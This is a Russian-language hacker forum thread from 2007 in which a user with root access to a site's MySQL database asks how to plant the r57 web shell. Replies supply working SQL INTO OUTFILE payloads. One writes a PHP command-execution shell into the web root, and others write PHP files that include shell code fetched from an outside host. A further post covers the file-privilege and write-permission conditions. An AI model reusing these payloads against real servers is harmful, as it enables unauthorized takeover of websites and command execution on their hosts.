Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   MySQL и root доступ (https://forum.antichat.xyz/showthread.php?t=44501)

Gargulia 15.07.2007 14:49

MySQL и root доступ
 
народ есть такая проблемка: имеется root доступ к MySQL... как подмять по себя сайт, r57 кидануть?
былобы все проще если бы на сервере были скрипты работающие с MySQL, но таковых не нашлось... вот сижу и туплю - че делать?

Ni0x 15.07.2007 15:06

все зависит от твоей цели, если нужен сайт, то залей шелл.

n1†R0x 15.07.2007 15:06

либо remote connect любым клиентом, гоу ту гугл.. если нет возможности удаленно управлять базой, то нужно залить на сервер какой-нибудь пхп-скрипт, недавно выкладывали РСТшные релизы, там была тулза для локальной работы с дб. ищи на форуме =)

Gargulia 15.07.2007 15:33

народ вы меня видимо немножко не так поняли...
У меня уже есть root к базе, я не знаю как залить туда шелл, вот в чем проблема...
есть какиенибудь мыслишки?

Ni0x 15.07.2007 15:40

используй
Цитата:

INTO OUTFILE

helat 15.07.2007 15:43

я понял что ему надо.
ему надо через бд залить шелл.
Ты говориш что нет скриптов какие работают с бд.
такоко не может быть ибо бессмысленно было ставить мускул (ведь это не хостинг (Тк как рута на хостинге врятли можно взять))
Гдето на форуме писали что через команду мускула льёться шелл.
поиши что то типа Шелл через бд или в этом роде

Zitt 15.07.2007 15:47

Узнаешь DOCUMENT_ROOT, потом
select '<?php system($cmd) ?>' from [table] into outfile '[DOCUMENT_ROOT]/shell.php'
select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

helat 15.07.2007 15:51

SELECT '<? @include("http://host.narod.ru/files.txt"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';

Вот был пример с пхп ББ

ENFIX 15.07.2007 15:56

Это если filepriv включен =)
и есть права на запись в папку

Gargulia 15.07.2007 16:49

всем спасибо.... я уже догнал Ni0x доходчиво объяснил....
а за это: select '<? @include("http://youfuckingsite.ru/shell.txt"); ?>' into outfile '/home/blalblalba/shell.php';

отдельное спасибо, ато я страдал сначало с маленьким шелом(прямо в запросе SELECT), что б патом тока через него залить r57...


Время: 22:47